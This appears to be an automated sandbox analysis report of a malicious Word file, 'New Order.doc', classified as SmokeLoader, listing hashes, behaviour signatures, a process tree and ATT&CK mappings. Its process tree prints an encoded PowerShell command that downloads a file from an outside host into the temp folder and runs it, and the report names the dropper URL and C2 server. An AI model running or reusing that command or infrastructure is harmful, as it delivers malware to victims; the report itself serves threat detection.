Analysis

  • max time kernel
    73s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-03-2021 10:06

General

  • Target

    New Order.doc

  • Size

    2.1MB

  • MD5

    1520f6a4a26f78c2e48798177d9eeb98

  • SHA1

    551262272bc63fe224d4f9bb50abbc70e7028ac5

  • SHA256

    ce5fdea4f80dbef6108295b6216ef43769683c384a4779e9042da6c1ddf4638c

  • SHA512

    7da17e9bfd098ea1f75dfd1ec791f64ab09c0290aa3069c308e0db566b3fefe39f3734903f5c8b0f20cac5a020949ef1e9f700f322c1b93c000735a5d784542f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://u.teknik.io/co0r5.txt

Extracted

Family

smokeloader

Version

2018

C2

http://cmcare.ca/1/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New Order.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1988
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Users\Public\69577.exe
        "C:\Users\Public\69577.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -executionpolicy bypass C:\Users\Admin\AppData\Roaming\ykZORLMXT.ps1
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:944
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYwBvADAAcgA1AC4AdAB4AHQAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAaQB0AHUAbgBlAHMALgBlAHgAZQAdICAAKQAgADsAIABzAHQAQQBSAHQAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAaQB0AHUAbgBlAHMALgBlAHgAZQAdIA==
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1748
            • C:\Users\Admin\AppData\Local\Temp\itunes.exe
              "C:\Users\Admin\AppData\Local\Temp\itunes.exe"
              5⤵
              • Executes dropped EXE
              • Maps connected drives based on registry
              • Suspicious behavior: MapViewOfSection
              PID:1320

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Exploitation for Client Execution

    1
    T1203

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      23a66dab5ad41f20fd5b7260a30a5281

      SHA1

      11ebd55a3ad3e2a7bde60676a1175578de5a5e94

      SHA256

      57e39ea2468a600f712d0765308ceea5dbf0a87153d9be90b51f89d1229dcead

      SHA512

      e572aedf2cf56a67a8f10baa46772d290821acb8bb86e11e1d219ccdcc5c86831c4efbc74f18f1dfc26095966e98da9bdd8612a576d0e0aa87f912b85c2347ff

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bfaf74-c48a-406b-812c-2684df821d22
      MD5

      597009ea0430a463753e0f5b1d1a249e

      SHA1

      4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

      SHA256

      3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

      SHA512

      5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
      MD5

      02ff38ac870de39782aeee04d7b48231

      SHA1

      0390d39fa216c9b0ecdb38238304e518fb2b5095

      SHA256

      fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

      SHA512

      24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
      MD5

      df44874327d79bd75e4264cb8dc01811

      SHA1

      1396b06debed65ea93c24998d244edebd3c0209d

      SHA256

      55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

      SHA512

      95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
      MD5

      75a8da7754349b38d64c87c938545b1b

      SHA1

      5c28c257d51f1c1587e29164cc03ea880c21b417

      SHA256

      bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

      SHA512

      798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
      MD5

      5e3c7184a75d42dda1a83606a45001d8

      SHA1

      94ca15637721d88f30eb4b6220b805c5be0360ed

      SHA256

      8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

      SHA512

      fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
      MD5

      b6d38f250ccc9003dd70efd3b778117f

      SHA1

      d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

      SHA256

      4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

      SHA512

      67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
      MD5

      be4d72095faf84233ac17b94744f7084

      SHA1

      cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

      SHA256

      b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

      SHA512

      43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadf780e-0f00-49bb-86e1-35585efd8a97
      MD5

      a725bb9fafcf91f3c6b7861a2bde6db2

      SHA1

      8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

      SHA256

      51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

      SHA512

      1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      3d56abdec83811861a31f58cfe25669c

      SHA1

      0a06ddaeeebcae18f975e4952b849f818d4185b7

      SHA256

      622b15e3a36bbc1b245a32862f97b69267a3d9f85660b75117bfc27f81ea6c38

      SHA512

      d612316f45cfd793597de17060f46cede770607c41eab9e91c6eb95ffc6a6a2cc44d814c5c866050826614fde00af95fc0ddd00e5f0afe70529520266d2e2311

    • C:\Users\Admin\AppData\Local\Temp\itunes.exe
      MD5

      a207204a635bec1ee31be6dd9f3802e0

      SHA1

      319da3a5c6b013a0c2dfaa8e954b1cd936f8336f

      SHA256

      0da52a9b8788344a1b1cbfd7505d1374367b5eea32153ceb522c4b41100fb940

      SHA512

      33eb8d57fd64627fe307731eb00cb3ee4de37137e51114d527d2e0e031cf575217c55dc65cd54d8e19410f8394acfa244742929a0bc9acc7686a0837c67b6ed9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      MD5

      7d72331067f9232064de9b8d71b901e2

      SHA1

      124fe5043c3b710d8af840afe005fe88a66eab64

      SHA256

      4b453405f3bebf60a9e4e8a7d189986eedef47bffb76711597972e306a5cd644

      SHA512

      482b087bad0a6136ec47f4c5ffc1a457522d8a1a698ae499196c6489e212eb5aac82cf742e8c606bcc6cc5924d0e6a9c2e96165b41323e427e16ec8adb422776

    • C:\Users\Admin\AppData\Roaming\ykZORLMXT.ps1
      MD5

      da95eb37257d41a5eca8dbec04c81fcc

      SHA1

      fdc44bd4d592f213ed1eea34ffcfb47ba694487f

      SHA256

      6da65411f049499f01eef91bb47c0171fb4a027d468d071f249c36bac458e668

      SHA512

      f187f1e55c2fa5f75d20ed95b7e54ba48f5424a4ccf2f2942e8f316a4ca6f8b2cefdee59415e8473121f223032631e5758a0aded1a6674628cebaf42bd69854c

    • C:\Users\Public\69577.exe
      MD5

      fcc595f22b212b4e0cce8a9ac0849fea

      SHA1

      6aa5c48c9bd9794b35d42e1a5053fccbb4a4823a

      SHA256

      a4ab08ff70e6117f5ca89a99fa94d63ba3468a7c97e2efc4d8ed6c634bb97671

      SHA512

      715ca8e30229c0f9f21427a253a9803ea85f6ba049ab7936816d9cf7c4a559691075ba918278ecf0ea8944c7e11c710ef87fd729c5ac265cb67fddab52e1bfee

    • C:\Users\Public\69577.exe
      MD5

      fcc595f22b212b4e0cce8a9ac0849fea

      SHA1

      6aa5c48c9bd9794b35d42e1a5053fccbb4a4823a

      SHA256

      a4ab08ff70e6117f5ca89a99fa94d63ba3468a7c97e2efc4d8ed6c634bb97671

      SHA512

      715ca8e30229c0f9f21427a253a9803ea85f6ba049ab7936816d9cf7c4a559691075ba918278ecf0ea8944c7e11c710ef87fd729c5ac265cb67fddab52e1bfee

    • \Users\Admin\AppData\Local\Temp\itunes.exe
      MD5

      a207204a635bec1ee31be6dd9f3802e0

      SHA1

      319da3a5c6b013a0c2dfaa8e954b1cd936f8336f

      SHA256

      0da52a9b8788344a1b1cbfd7505d1374367b5eea32153ceb522c4b41100fb940

      SHA512

      33eb8d57fd64627fe307731eb00cb3ee4de37137e51114d527d2e0e031cf575217c55dc65cd54d8e19410f8394acfa244742929a0bc9acc7686a0837c67b6ed9

    • \Users\Admin\AppData\Local\Temp\itunes.exe
      MD5

      a207204a635bec1ee31be6dd9f3802e0

      SHA1

      319da3a5c6b013a0c2dfaa8e954b1cd936f8336f

      SHA256

      0da52a9b8788344a1b1cbfd7505d1374367b5eea32153ceb522c4b41100fb940

      SHA512

      33eb8d57fd64627fe307731eb00cb3ee4de37137e51114d527d2e0e031cf575217c55dc65cd54d8e19410f8394acfa244742929a0bc9acc7686a0837c67b6ed9

    • \Users\Public\69577.exe
      MD5

      fcc595f22b212b4e0cce8a9ac0849fea

      SHA1

      6aa5c48c9bd9794b35d42e1a5053fccbb4a4823a

      SHA256

      a4ab08ff70e6117f5ca89a99fa94d63ba3468a7c97e2efc4d8ed6c634bb97671

      SHA512

      715ca8e30229c0f9f21427a253a9803ea85f6ba049ab7936816d9cf7c4a559691075ba918278ecf0ea8944c7e11c710ef87fd729c5ac265cb67fddab52e1bfee

    • memory/616-8-0x000007FEF7F70000-0x000007FEF81EA000-memory.dmp
      Filesize

      2.5MB

    • memory/944-21-0x00000000024D2000-0x00000000024D3000-memory.dmp
      Filesize

      4KB

    • memory/944-19-0x0000000004790000-0x0000000004791000-memory.dmp
      Filesize

      4KB

    • memory/944-27-0x00000000055E0000-0x00000000055E1000-memory.dmp
      Filesize

      4KB

    • memory/944-32-0x00000000056B0000-0x00000000056B1000-memory.dmp
      Filesize

      4KB

    • memory/944-33-0x00000000062A0000-0x00000000062A1000-memory.dmp
      Filesize

      4KB

    • memory/944-40-0x0000000006170000-0x0000000006171000-memory.dmp
      Filesize

      4KB

    • memory/944-41-0x0000000006330000-0x0000000006331000-memory.dmp
      Filesize

      4KB

    • memory/944-15-0x0000000000000000-mapping.dmp
    • memory/944-22-0x0000000002630000-0x0000000002631000-memory.dmp
      Filesize

      4KB

    • memory/944-45-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/944-17-0x000000006AA40000-0x000000006B12E000-memory.dmp
      Filesize

      6.9MB

    • memory/944-18-0x0000000000630000-0x0000000000631000-memory.dmp
      Filesize

      4KB

    • memory/944-23-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/944-20-0x00000000024D0000-0x00000000024D1000-memory.dmp
      Filesize

      4KB

    • memory/1192-70-0x0000000002C30000-0x0000000002C45000-memory.dmp
      Filesize

      84KB

    • memory/1192-69-0x0000000002F70000-0x0000000002F71000-memory.dmp
      Filesize

      4KB

    • memory/1320-66-0x0000000000000000-mapping.dmp
    • memory/1344-10-0x0000000000000000-mapping.dmp
    • memory/1644-7-0x00000000767E1000-0x00000000767E3000-memory.dmp
      Filesize

      8KB

    • memory/1748-42-0x0000000000000000-mapping.dmp
    • memory/1748-51-0x00000000048D0000-0x00000000048D1000-memory.dmp
      Filesize

      4KB

    • memory/1748-46-0x000000006AA40000-0x000000006B12E000-memory.dmp
      Filesize

      6.9MB

    • memory/1748-52-0x00000000048D2000-0x00000000048D3000-memory.dmp
      Filesize

      4KB

    • memory/1856-3-0x0000000070751000-0x0000000070753000-memory.dmp
      Filesize

      8KB

    • memory/1856-2-0x0000000072CD1000-0x0000000072CD4000-memory.dmp
      Filesize

      12KB

    • memory/1856-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1988-5-0x0000000000000000-mapping.dmp
    • memory/1988-6-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp
      Filesize

      8KB